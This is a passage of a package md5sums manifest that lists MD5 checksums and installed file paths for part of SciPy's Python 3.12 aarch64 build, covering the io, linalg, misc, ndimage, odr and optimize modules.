36b1be7f98dc42eb939811ff892c0ebb  usr/lib/python3/dist-packages/scipy/io/tests/test_fortran.py
41b9cd0a0b385e461b873f330f8e1917  usr/lib/python3/dist-packages/scipy/io/tests/test_idl.py
314232504f966647b6385cc7f09ed458  usr/lib/python3/dist-packages/scipy/io/tests/test_mmio.py
94ba71d9f87fce994b349075e68fc2b3  usr/lib/python3/dist-packages/scipy/io/tests/test_netcdf.py
4928ff982bd56d2e9828ecec69e4bee7  usr/lib/python3/dist-packages/scipy/io/tests/test_paths.py
22d53ac84fd08095dcfa7545ce86ba29  usr/lib/python3/dist-packages/scipy/io/tests/test_wavfile.py
3aa549193a6d84f05d78b3158eea2195  usr/lib/python3/dist-packages/scipy/io/wavfile.py
71b2c92415e83812636f7a5aef0cbfab  usr/lib/python3/dist-packages/scipy/linalg.pxd
89f24a618594c499762be0b6c48b480a  usr/lib/python3/dist-packages/scipy/linalg/__init__.py
af5f642295f66e587b5b917399114453  usr/lib/python3/dist-packages/scipy/linalg/_basic.py
3e7e0faaac0f6fbeb4c2ce3dcd24ada1  usr/lib/python3/dist-packages/scipy/linalg/_blas_subroutine_wrappers.f
824f575a50a811202da605ee02eca916  usr/lib/python3/dist-packages/scipy/linalg/_blas_subroutines.h
cef27b75b46c4e209c9ee614b7ec3ddc  usr/lib/python3/dist-packages/scipy/linalg/_cythonized_array_utils.cpython-312-aarch64-linux-gnu.so
b6b41025b55064cc0baa37a581123a1c  usr/lib/python3/dist-packages/scipy/linalg/_cythonized_array_utils.pxd
cd8cbc9e95b802638bc64ef261141456  usr/lib/python3/dist-packages/scipy/linalg/_cythonized_array_utils.pyi
21863b6dc449ddf59e7c0614da3969a2  usr/lib/python3/dist-packages/scipy/linalg/_decomp.py
56ff1ca846044af41f705bb0f92463d0  usr/lib/python3/dist-packages/scipy/linalg/_decomp_cholesky.py
dce378fd4a6c7f105fcba9e232a4e1da  usr/lib/python3/dist-packages/scipy/linalg/_decomp_cossin.py
71c3f578954c76847cb5d5f181df59d9  usr/lib/python3/dist-packages/scipy/linalg/_decomp_ldl.py
866645e21e041a3a3dc467b4981dab61  usr/lib/python3/dist-packages/scipy/linalg/_decomp_lu.py
8f09805ae943b141cd469f12104dfaee  usr/lib/python3/dist-packages/scipy/linalg/_decomp_lu_cython.cpython-312-aarch64-linux-gnu.so
ce97f8a55c332e1f30c29ff40cd814d2  usr/lib/python3/dist-packages/scipy/linalg/_decomp_lu_cython.pyi
a0d7ad078ffd9049d87900aa5e3f6dc0  usr/lib/python3/dist-packages/scipy/linalg/_decomp_polar.py
8a9b5796fe92d5c3a9ef56dced9ed2ec  usr/lib/python3/dist-packages/scipy/linalg/_decomp_qr.py
1d0d80e413a9ff6eb2984897e0247bb1  usr/lib/python3/dist-packages/scipy/linalg/_decomp_qz.py
4deb90a4d82fdb1c49b4563030f1cdfd  usr/lib/python3/dist-packages/scipy/linalg/_decomp_schur.py
3bb8360ec490fb120b5bb62a0f17c2c2  usr/lib/python3/dist-packages/scipy/linalg/_decomp_svd.py
0a9f2be8e03176e62658b1c44e2c356a  usr/lib/python3/dist-packages/scipy/linalg/_decomp_update.cpython-312-aarch64-linux-gnu.so
dd8ea7ba21c65a257706e1b1e3513fb0  usr/lib/python3/dist-packages/scipy/linalg/_expm_frechet.py
c15794ca4f519b0636d55dc9f69baa92  usr/lib/python3/dist-packages/scipy/linalg/_fblas.cpython-312-aarch64-linux-gnu.so
1337a5b8493a045ce8b116a6cdc468ca  usr/lib/python3/dist-packages/scipy/linalg/_flapack.cpython-312-aarch64-linux-gnu.so
12effff9477d9194231107d93c6cb72e  usr/lib/python3/dist-packages/scipy/linalg/_flinalg.cpython-312-aarch64-linux-gnu.so
c8ef9a82e9c1b56dccc31601966e507b  usr/lib/python3/dist-packages/scipy/linalg/_flinalg_py.py
aaaa7b1b1b175649311b14111c590398  usr/lib/python3/dist-packages/scipy/linalg/_interpolative.cpython-312-aarch64-linux-gnu.so
bc813dbacef4d10478baa01a57cbe510  usr/lib/python3/dist-packages/scipy/linalg/_interpolative_backend.py
2d0059bf8bdb234b7d2b27c6d0b2384b  usr/lib/python3/dist-packages/scipy/linalg/_lapack_subroutine_wrappers.f
366a1b8f7694193f7e4d947ab7c68d2b  usr/lib/python3/dist-packages/scipy/linalg/_lapack_subroutines.h
f52b0cedb8072bd3aac35528bc7a23f4  usr/lib/python3/dist-packages/scipy/linalg/_matfuncs.py
b85d4b7d3134720885399d9ed4e980de  usr/lib/python3/dist-packages/scipy/linalg/_matfuncs_expm.cpython-312-aarch64-linux-gnu.so
79d35b7ede9cdfe422b2e8f51a894f8c  usr/lib/python3/dist-packages/scipy/linalg/_matfuncs_expm.pyi
9a7c8750ce40677cffadf95de567053e  usr/lib/python3/dist-packages/scipy/linalg/_matfuncs_inv_ssq.py
0ae2bb4aea01b2c438400870c515a4b9  usr/lib/python3/dist-packages/scipy/linalg/_matfuncs_sqrtm.py
7050b41ebd75a636dbd08ebcc1fbdcdc  usr/lib/python3/dist-packages/scipy/linalg/_matfuncs_sqrtm_triu.cpython-312-aarch64-linux-gnu.so
669aadd88cb2d77c4e6dd91b2b4634f8  usr/lib/python3/dist-packages/scipy/linalg/_misc.py
a8b2ba4035d32dbee4ce452a6bd37304  usr/lib/python3/dist-packages/scipy/linalg/_procrustes.py
c4bdb7a86a0d85f748759381722086ab  usr/lib/python3/dist-packages/scipy/linalg/_sketches.py
54f1fe9d73b5f8e8d7c8c85daa9b9e1a  usr/lib/python3/dist-packages/scipy/linalg/_solve_toeplitz.cpython-312-aarch64-linux-gnu.so
7d155f5f2e055c504abde3dbf16ceb11  usr/lib/python3/dist-packages/scipy/linalg/_solvers.py
b57b593cf91e35dbb98d100a1dcba477  usr/lib/python3/dist-packages/scipy/linalg/_special_matrices.py
2e8315285b95cdcde9cf3cbe7fbac45f  usr/lib/python3/dist-packages/scipy/linalg/_testutils.py
30482ab080b04e37fc6c252a89eed4fa  usr/lib/python3/dist-packages/scipy/linalg/basic.py
2fe56678f017f3b7527e102511b656e1  usr/lib/python3/dist-packages/scipy/linalg/blas.py
0d30291d0775c7bb6bfacac6726a980f  usr/lib/python3/dist-packages/scipy/linalg/cython_blas.cpython-312-aarch64-linux-gnu.so
365d8dbebaf8fdfd9740abc0cc6e8e5c  usr/lib/python3/dist-packages/scipy/linalg/cython_blas.pxd
0a8468053c8072076dde87f3a42c0840  usr/lib/python3/dist-packages/scipy/linalg/cython_blas.pyx
ff38344c1fb1d41e23a29d5b3ee06ed5  usr/lib/python3/dist-packages/scipy/linalg/cython_lapack.cpython-312-aarch64-linux-gnu.so
ba4598f691be5be060e2c86e498ed027  usr/lib/python3/dist-packages/scipy/linalg/cython_lapack.pxd
3590307997bb176c8e0a9fe11f71ea9d  usr/lib/python3/dist-packages/scipy/linalg/cython_lapack.pyx
3a4372e1b743f7bc24ce4b3e77f4a0de  usr/lib/python3/dist-packages/scipy/linalg/decomp.py
903b5398b52c3951e1f0a15d5944c1e2  usr/lib/python3/dist-packages/scipy/linalg/decomp_cholesky.py
92d4f6558ab1094354dd14e674273543  usr/lib/python3/dist-packages/scipy/linalg/decomp_lu.py
633ece305174968ad723840905381a24  usr/lib/python3/dist-packages/scipy/linalg/decomp_qr.py
3b8f3735b41cc86a7da09428e21f232b  usr/lib/python3/dist-packages/scipy/linalg/decomp_schur.py
928f3079ef3f3cbc12b51f43802601bd  usr/lib/python3/dist-packages/scipy/linalg/decomp_svd.py
b60dfb7ec31f623f2a053416022edc05  usr/lib/python3/dist-packages/scipy/linalg/flinalg.py
98a77d96c1f2b0eddfce801147f2a978  usr/lib/python3/dist-packages/scipy/linalg/interpolative.py
f0e5a1c58ec9048a3019e25606708b97  usr/lib/python3/dist-packages/scipy/linalg/lapack.py
bad53e5c6bfbc37ad75c634bfabd829e  usr/lib/python3/dist-packages/scipy/linalg/matfuncs.py
28b79912ea0f5873d3d8f1027160ffd6  usr/lib/python3/dist-packages/scipy/linalg/misc.py
ff9b1357a74da8d1ca0bcc279d09dfa0  usr/lib/python3/dist-packages/scipy/linalg/special_matrices.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/linalg/tests/__init__.py
45f28f0226d121e589bfee173e1104c9  usr/lib/python3/dist-packages/scipy/linalg/tests/data/carex_15_data.npz
71ff60d219b15b909283a70912cf1445  usr/lib/python3/dist-packages/scipy/linalg/tests/data/carex_18_data.npz
aac4ee2316dfd28e24dc7e2734c36d62  usr/lib/python3/dist-packages/scipy/linalg/tests/data/carex_19_data.npz
348dea7fc9869be709fdcdb285387301  usr/lib/python3/dist-packages/scipy/linalg/tests/data/carex_20_data.npz
316afb48d774a180bf35a1b4d5e17dd8  usr/lib/python3/dist-packages/scipy/linalg/tests/data/carex_6_data.npz
feb9321d473e864fd45e45960de7172d  usr/lib/python3/dist-packages/scipy/linalg/tests/data/gendare_20170120_data.npz
7d681f8626f1e15918685acbc78bd352  usr/lib/python3/dist-packages/scipy/linalg/tests/test_basic.py
3fd4a3bcf36e0dc57f5c71ae30cb5a81  usr/lib/python3/dist-packages/scipy/linalg/tests/test_blas.py
af381d1d923cc031ae3813b3da54ce70  usr/lib/python3/dist-packages/scipy/linalg/tests/test_cython_blas.py
31242a841d3c74202a7bf3388ebdb60c  usr/lib/python3/dist-packages/scipy/linalg/tests/test_cython_lapack.py
a1d17e870ffff2a9fb3004c18ec2e674  usr/lib/python3/dist-packages/scipy/linalg/tests/test_cythonized_array_utils.py
72fc88e0097f9432a05e23f6eaa2de30  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp.py
32f64dae8c19e1c0b8f9493f99b85ffc  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp_cholesky.py
b7547e9d8d67c448c5f5184a82ff7236  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp_cossin.py
132a5b3ccb300ed07e3818f6594a7849  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp_ldl.py
c2d8b963d9a3a09f6ef9cd04626dc913  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp_lu.py
789819520f4b907bf936cddb5069e72a  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp_polar.py
69bed30e9173b00949e7c257c49aae7b  usr/lib/python3/dist-packages/scipy/linalg/tests/test_decomp_update.py
b27c7545c65a661513fa4211ef56a7d5  usr/lib/python3/dist-packages/scipy/linalg/tests/test_fblas.py
a7a5f9f6e3bcaf28324ab2daeb3eea60  usr/lib/python3/dist-packages/scipy/linalg/tests/test_interpolative.py
2758d6c1771870a0a23895c141ac8bcd  usr/lib/python3/dist-packages/scipy/linalg/tests/test_lapack.py
10871919885002bf6d6f6f9e8ac0a9db  usr/lib/python3/dist-packages/scipy/linalg/tests/test_matfuncs.py
5ecf9a7db2c1dee4cf846d3c3fdd85a4  usr/lib/python3/dist-packages/scipy/linalg/tests/test_matmul_toeplitz.py
573470123bfd140240e6529e7364d142  usr/lib/python3/dist-packages/scipy/linalg/tests/test_misc.py
47b6329c2921346d790953ac50988ac2  usr/lib/python3/dist-packages/scipy/linalg/tests/test_procrustes.py
eadcf02839928304fa89095e54093845  usr/lib/python3/dist-packages/scipy/linalg/tests/test_sketches.py
1dc2fdedd839cc311079210c274dee43  usr/lib/python3/dist-packages/scipy/linalg/tests/test_solve_toeplitz.py
77a4dce3a26fdb33e7870610a43bb94e  usr/lib/python3/dist-packages/scipy/linalg/tests/test_solvers.py
3780c7910654e36351f887b07108bb9d  usr/lib/python3/dist-packages/scipy/linalg/tests/test_special_matrices.py
879b553f0f04e97674b488ea25bebb69  usr/lib/python3/dist-packages/scipy/misc/__init__.py
faa5d67155217574877fe7e353ed31a2  usr/lib/python3/dist-packages/scipy/misc/_common.py
b705acbf377b3a9832e2ce6d6a258a32  usr/lib/python3/dist-packages/scipy/misc/ascent.dat
42cc7ec0c39197846429a1c0740a4ee3  usr/lib/python3/dist-packages/scipy/misc/common.py
85e95d00b5692b9f57624025cd558289  usr/lib/python3/dist-packages/scipy/misc/doccer.py
e55eada8a1ee837b57e609e8c7341beb  usr/lib/python3/dist-packages/scipy/misc/ecg.dat
55f6b72345023de0129fe7a264a6a37d  usr/lib/python3/dist-packages/scipy/misc/face.dat
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/misc/tests/__init__.py
3cf811db7cbf532173f9d149fc003265  usr/lib/python3/dist-packages/scipy/misc/tests/test_common.py
9214ad0f7b01e29506daf76ddba6d520  usr/lib/python3/dist-packages/scipy/misc/tests/test_config.py
a2c419c33375b8c97e74e2f237a84165  usr/lib/python3/dist-packages/scipy/misc/tests/test_doccer.py
bb08c83d8060bd10aaa6d14aa8188fb4  usr/lib/python3/dist-packages/scipy/ndimage/__init__.py
6e7602726dac1f764936249ff9882ef7  usr/lib/python3/dist-packages/scipy/ndimage/_ctest.cpython-312-aarch64-linux-gnu.so
3a87b10426a6f3c738a4eb1aba011969  usr/lib/python3/dist-packages/scipy/ndimage/_cytest.cpython-312-aarch64-linux-gnu.so
b970b96449dee6111eacf097923961f3  usr/lib/python3/dist-packages/scipy/ndimage/_filters.py
33a640454d5912c9ce6b88e8490ce551  usr/lib/python3/dist-packages/scipy/ndimage/_fourier.py
1bde2474975f7826302743762cd42d63  usr/lib/python3/dist-packages/scipy/ndimage/_interpolation.py
de1d4765952f5913dcf67cb79aff7d02  usr/lib/python3/dist-packages/scipy/ndimage/_measurements.py
12309cf7df34e9afa5fd2966aeb469af  usr/lib/python3/dist-packages/scipy/ndimage/_morphology.py
71398462f91d916a4beb116b42e4ffe4  usr/lib/python3/dist-packages/scipy/ndimage/_nd_image.cpython-312-aarch64-linux-gnu.so
5c605a7fdcfaf8dec0f960a4d2aaa72c  usr/lib/python3/dist-packages/scipy/ndimage/_ni_docstrings.py
1891054d424c30bd958979478f9fc956  usr/lib/python3/dist-packages/scipy/ndimage/_ni_label.cpython-312-aarch64-linux-gnu.so
e977e3aef1e7188f5045b4cd1816a39d  usr/lib/python3/dist-packages/scipy/ndimage/_ni_support.py
7160834561df172225a6e2b3b504717e  usr/lib/python3/dist-packages/scipy/ndimage/filters.py
1efeabe989f8d37b70f148b85a70fe1a  usr/lib/python3/dist-packages/scipy/ndimage/fourier.py
495f05d894946a9b87804710bed98bfb  usr/lib/python3/dist-packages/scipy/ndimage/interpolation.py
5ef18677da5289120e307e3ee2c82505  usr/lib/python3/dist-packages/scipy/ndimage/measurements.py
b54817c7a59d7fb7fd7760b4bd66f14c  usr/lib/python3/dist-packages/scipy/ndimage/morphology.py
f58bfb598a1f6e3075e0f98cea561121  usr/lib/python3/dist-packages/scipy/ndimage/tests/__init__.py
ed3d00a5b1a6eba74fa675f861dc8414  usr/lib/python3/dist-packages/scipy/ndimage/tests/data/label_inputs.txt
0d9ec17302ab9bdf0d8015b5d05323f4  usr/lib/python3/dist-packages/scipy/ndimage/tests/data/label_results.txt
2af42c2d68f445016c02c9a2adcf08c2  usr/lib/python3/dist-packages/scipy/ndimage/tests/data/label_strels.txt
c431a80cdaf956a1eaf650b8648d0fd8  usr/lib/python3/dist-packages/scipy/ndimage/tests/dots.png
e49918fa02d9a6f3f81a29bbfa14572f  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_c_api.py
2bbdaad07010012e093823ea9746a08e  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_datatypes.py
a98550b59ebc5cb993ba7a2dda189eb7  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_filters.py
dee55f15e0ddad501b76c94468915bd3  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_fourier.py
95fc660f6a283c863bdd72fbc35749c8  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_interpolation.py
bab46237664cd41fe66ac284434cd527  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_measurements.py
435d8b851de2973d13bebea77655f924  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_morphology.py
3cdba1b3a8ed2bf817d6926bfa574aff  usr/lib/python3/dist-packages/scipy/ndimage/tests/test_splines.py
50507e6a9869d0948ceb31e2e4bb4ccc  usr/lib/python3/dist-packages/scipy/odr/__init__.py
758a98adb55e77b9b0c6a2bbaee9e34a  usr/lib/python3/dist-packages/scipy/odr/__odrpack.cpython-312-aarch64-linux-gnu.so
ee02de2728696ccce33eddbfd144eda5  usr/lib/python3/dist-packages/scipy/odr/_add_newdocs.py
dca461ceeca45acb07f8640f438e79f0  usr/lib/python3/dist-packages/scipy/odr/_models.py
f96348865f9792d145b8e373b0819b60  usr/lib/python3/dist-packages/scipy/odr/_odrpack.py
4d1f096f36319f4d7335d614349d8774  usr/lib/python3/dist-packages/scipy/odr/models.py
4f566c270f68fc95a2790ae8c34383af  usr/lib/python3/dist-packages/scipy/odr/odrpack.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/odr/tests/__init__.py
922ca35ee299302696f639dbfe9271b0  usr/lib/python3/dist-packages/scipy/odr/tests/test_odr.py
18ce8a9a115941765e3149d9929409e5  usr/lib/python3/dist-packages/scipy/optimize.pxd
9d8fbfae24e8b51c9fbd2dde89b8ee65  usr/lib/python3/dist-packages/scipy/optimize/README
11539a93374255ad08c091af19d7cf9f  usr/lib/python3/dist-packages/scipy/optimize/__init__.py
6e80a9a6042f3a773b06ec95bfbf86fc  usr/lib/python3/dist-packages/scipy/optimize/__nnls.cpython-312-aarch64-linux-gnu.so
95154859c49240b336cea6843ab1f6c5  usr/lib/python3/dist-packages/scipy/optimize/__nnls.pyi
1ade8dade7e33b638b7abf33d79cac2c  usr/lib/python3/dist-packages/scipy/optimize/_basinhopping.py
40d8e6f9b78bfe42a49d68327e5cad99  usr/lib/python3/dist-packages/scipy/optimize/_bglu_dense.cpython-312-aarch64-linux-gnu.so
95eb16388501028257b90fcd77a9cf94  usr/lib/python3/dist-packages/scipy/optimize/_cobyla.cpython-312-aarch64-linux-gnu.so
0c6082d9b18fd7d15f21235ff6d683cd  usr/lib/python3/dist-packages/scipy/optimize/_cobyla_py.py
98a85c1983994a68583b04c65f294ec8  usr/lib/python3/dist-packages/scipy/optimize/_constraints.py
98801f590eca677a7e0a388dabafa8a3  usr/lib/python3/dist-packages/scipy/optimize/_differentiable_functions.py
925a893d1ffb3c5b85d8ca27c5626b23  usr/lib/python3/dist-packages/scipy/optimize/_differentialevolution.py
1959ccbe97abd816b84fd2672530ff94  usr/lib/python3/dist-packages/scipy/optimize/_direct.cpython-312-aarch64-linux-gnu.so
eeb74fb1f76cc99a75eccc82836bf8de  usr/lib/python3/dist-packages/scipy/optimize/_direct_py.py
f0943d3be42b749f9e3efd445366a87c  usr/lib/python3/dist-packages/scipy/optimize/_dual_annealing.py
985c0d117c001860c1486be955bd6e15  usr/lib/python3/dist-packages/scipy/optimize/_group_columns.cpython-312-aarch64-linux-gnu.so
707dac6bd0fa4a6fc19cd16118ef7860  usr/lib/python3/dist-packages/scipy/optimize/_hessian_update_strategy.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/optimize/_highs/__init__.py
89d057ae138e2f33b94addf651e650ff  usr/lib/python3/dist-packages/scipy/optimize/_highs/_highs_constants.cpython-312-aarch64-linux-gnu.so
e0513c162d38238328cb3917ae77d233  usr/lib/python3/dist-packages/scipy/optimize/_highs/_highs_wrapper.cpython-312-aarch64-linux-gnu.so
6e706cf5099e33ab898b8274af28022f  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HConst.pxd
46ccecc1f1643596d63706f601dea585  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/Highs.pxd
28d7228dc6cd0a9f1f8f838ac749c7e3  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsIO.pxd
709bfd51a18cb8bb2b7f0987c7944708  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsInfo.pxd
bf4b143ae6128fe2dba766e11c1b63f2  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsLp.pxd
980f72717d16725ca2f2271f48d1850f  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsLpUtils.pxd
ed151d898a29d43670179f7132b2b657  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsModelUtils.pxd
c5b7e501eb935d813dbbcc8e7f753eab  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsOptions.pxd
d2e8d9fa565330d95c27d1761f22ac70  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsRuntimeOptions.pxd
b9d966f01773498998d6a594b532fa5c  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/HighsStatus.pxd
30d3ca0a90d71ddb71843fa7ecba2c80  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/SimplexConst.pxd
36cb7db73dbe99335c28bced323f1212  usr/lib/python3/dist-packages/scipy/optimize/_highs/src/cython/highs_c_api.pxd
6e8b38df04a1d846b438a83209cdee59  usr/lib/python3/dist-packages/scipy/optimize/_lbfgsb.cpython-312-aarch64-linux-gnu.so
db8f48f3907d64ac3c421f435a99074f  usr/lib/python3/dist-packages/scipy/optimize/_lbfgsb_py.py
cba0a56dbd7a13fc1e8bbdbf57558370  usr/lib/python3/dist-packages/scipy/optimize/_linesearch.py
9904eb416e45377cecdd84aaaad226eb  usr/lib/python3/dist-packages/scipy/optimize/_linprog.py
ca52d3e86ad9f03f9f5197ecead6c92f  usr/lib/python3/dist-packages/scipy/optimize/_linprog_doc.py
3c535a554c355d9ab474bf443f504714  usr/lib/python3/dist-packages/scipy/optimize/_linprog_highs.py
8f1070c61a4c3f8267ff7e19c0da723b  usr/lib/python3/dist-packages/scipy/optimize/_linprog_ip.py
b6e6eb8b32be48f2e89d9fa694a49b95  usr/lib/python3/dist-packages/scipy/optimize/_linprog_rs.py
0accfe964dc90caa6a0b28d54dc64d63  usr/lib/python3/dist-packages/scipy/optimize/_linprog_simplex.py
b95ffcdf8fa8bd58bb341f2c3ab2e9a2  usr/lib/python3/dist-packages/scipy/optimize/_linprog_util.py
d39fed41d86de87142b43eb09d95cc2e  usr/lib/python3/dist-packages/scipy/optimize/_lsap.cpython-312-aarch64-linux-gnu.so
5bbe527e569f832898658685083471c0  usr/lib/python3/dist-packages/scipy/optimize/_lsq/__init__.py
9c5f77743187874ce33b533f58fcce97  usr/lib/python3/dist-packages/scipy/optimize/_lsq/bvls.py
acf57a66f348b8a7a044494f9ef040be  usr/lib/python3/dist-packages/scipy/optimize/_lsq/common.py
a97156b6ee1a9e460ee909fe30e01aa9  usr/lib/python3/dist-packages/scipy/optimize/_lsq/dogbox.py
e0cf73cdf05d9143d3a91b89d03a5afe  usr/lib/python3/dist-packages/scipy/optimize/_lsq/givens_elimination.cpython-312-aarch64-linux-gnu.so
8469f4136e2d7e04637d3a15eb753269  usr/lib/python3/dist-packages/scipy/optimize/_lsq/least_squares.py
2cfb461509dff3403562430b308a6115  usr/lib/python3/dist-packages/scipy/optimize/_lsq/lsq_linear.py
510bce1b66f85d2554d120a3fb558232  usr/lib/python3/dist-packages/scipy/optimize/_lsq/trf.py
238fa52ab18a63c39ec7b5b1735b006e  usr/lib/python3/dist-packages/scipy/optimize/_lsq/trf_linear.py
1a753e4884b79796fc63eebb8c971614  usr/lib/python3/dist-packages/scipy/optimize/_milp.py
cb30f6d6c3a2e74742cbf7e9c5f354d2  usr/lib/python3/dist-packages/scipy/optimize/_minimize.py
6880e4e0594792824574f933a9770bd6  usr/lib/python3/dist-packages/scipy/optimize/_minpack.cpython-312-aarch64-linux-gnu.so
e4225e40b229109db95edbde5289d3a4  usr/lib/python3/dist-packages/scipy/optimize/_minpack2.cpython-312-aarch64-linux-gnu.so
51f02d4346b886d1701a2f94bf26a1d8  usr/lib/python3/dist-packages/scipy/optimize/_minpack_py.py
edb14191388e8d030fd2ae68b3e60b35  usr/lib/python3/dist-packages/scipy/optimize/_moduleTNC.cpython-312-aarch64-linux-gnu.so
4ad70d0966240b61f79092c75bd29cab  usr/lib/python3/dist-packages/scipy/optimize/_nnls.py
bc428959884f1529a16d5ae6cfdfb037  usr/lib/python3/dist-packages/scipy/optimize/_nonlin.py
aaf6d3ad2888cebe4d83e94ebb6d8dd7  usr/lib/python3/dist-packages/scipy/optimize/_numdiff.py
6a663052f613369828525bcc64301263  usr/lib/python3/dist-packages/scipy/optimize/_optimize.py
1608f39078a8bd74daa20d54b379dc36  usr/lib/python3/dist-packages/scipy/optimize/_qap.py
a624dcdfa38251f9c0606f0e3fbe9e1d  usr/lib/python3/dist-packages/scipy/optimize/_remove_redundancy.py
7a9203f8553fbbdc8994c5b5b828b91a  usr/lib/python3/dist-packages/scipy/optimize/_root.py
e773f6ae94a4b9726d1c449023293ca0  usr/lib/python3/dist-packages/scipy/optimize/_root_scalar.py
c16218de2cefb53b1ba1cc7e95d5f5a7  usr/lib/python3/dist-packages/scipy/optimize/_shgo.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/optimize/_shgo_lib/__init__.py
c6a1bc619f87766b4a9f306cd0d97dec  usr/lib/python3/dist-packages/scipy/optimize/_shgo_lib/_complex.py
c63c7f175995711ff9dbf63caf85ef00  usr/lib/python3/dist-packages/scipy/optimize/_shgo_lib/_vertex.py
9195c25220d981cc29fd74e75035cd37  usr/lib/python3/dist-packages/scipy/optimize/_slsqp.cpython-312-aarch64-linux-gnu.so
c6f6d0887263731d9f6c84da7399307f  usr/lib/python3/dist-packages/scipy/optimize/_slsqp_py.py
55e1f17d43d940f60bd72c621a5a5092  usr/lib/python3/dist-packages/scipy/optimize/_spectral.py
0b03671b1e3b8471e27738eeb24d23f2  usr/lib/python3/dist-packages/scipy/optimize/_tnc.py
d7b5a3212d393829e91ad2f950645ac2  usr/lib/python3/dist-packages/scipy/optimize/_trlib/__init__.py
05182185a0ff30adf53e9d95b95a2023  usr/lib/python3/dist-packages/scipy/optimize/_trlib/_trlib.cpython-312-aarch64-linux-gnu.so
a48c9eac2ca1dbb72821ae065290c823  usr/lib/python3/dist-packages/scipy/optimize/_trustregion.py
41c3c78ebd815565543b6cc69292bf14  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/__init__.py
73990562640f518c2c4f123b0efd72b1  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/canonical_constraint.py
852ba332a2a5ddf12e9a15f37357cde4  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/equality_constrained_sqp.py
666b4ef41d3c99d775b5fd0d10f6b191  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/minimize_trustregion_constr.py
ecf7876463bb297903c44a50ae47dcc3  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/projections.py
cb06105a020a676a1d64e59e09cb567a  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/qp_subproblem.py
ef55527530c8051b33d35e9848a0bffc  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/report.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/tests/__init__.py
b0c156de6907eec08e2b8afd1b906dd5  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/tests/test_canonical_constraint.py
0cbff6e69ab6c18c0be573cd5d7c255b  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/tests/test_projections.py
d2fa3dfe340d8e6d68d1d57d1cad6404  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
930eb620256c16ebfeaddf4941edf592  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/tests/test_report.py
8dbdda26a109800406db73c5d4e33cc9  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_constr/tr_interior_point.py
884fa97834ca475de9446b0fc45899fe  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_dogleg.py
9d4c5fba92a959a8e2e466f8fd08df80  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_exact.py
50fa9970a35a2eb09ff64d5394de7659  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_krylov.py
d3bf24b016d9ac1c0a2a2aedc7da2877  usr/lib/python3/dist-packages/scipy/optimize/_trustregion_ncg.py
7f9cd011727d8ff6413223896d33f204  usr/lib/python3/dist-packages/scipy/optimize/_tstutils.py
b653720758869879d3f1a533aee20632  usr/lib/python3/dist-packages/scipy/optimize/_zeros.cpython-312-aarch64-linux-gnu.so
9d1fbf555d5e47ac14f7b7277a21671e  usr/lib/python3/dist-packages/scipy/optimize/_zeros_py.py
f3d2214a538f6f62536c084f656dce62  usr/lib/python3/dist-packages/scipy/optimize/cobyla.py
7ccfbf4ac13087bd4988639d8bb14276  usr/lib/python3/dist-packages/scipy/optimize/cython_optimize.pxd
a9bce435ee5345e7f2c9887dbabaab10  usr/lib/python3/dist-packages/scipy/optimize/cython_optimize/__init__.py
8f5216d41ce2e4392243189fd09e2376  usr/lib/python3/dist-packages/scipy/optimize/cython_optimize/_zeros.cpython-312-aarch64-linux-gnu.so
b3bc4212b423247d6e0e37b89c0c3e38  usr/lib/python3/dist-packages/scipy/optimize/cython_optimize/_zeros.pxd
d54a751c95f738e4cabb9e3bf0a70a5c  usr/lib/python3/dist-packages/scipy/optimize/cython_optimize/c_zeros.pxd
dcc00548eb8c0d8fc918aa89eaaf8045  usr/lib/python3/dist-packages/scipy/optimize/lbfgsb.py
323e83201ea9e11ea6e733917c97cb90  usr/lib/python3/dist-packages/scipy/optimize/linesearch.py
8756125ca244442bab33dd272f92e177  usr/lib/python3/dist-packages/scipy/optimize/minpack.py
03e19d79ca513a5aa9563bd7f9761e25  usr/lib/python3/dist-packages/scipy/optimize/minpack2.py
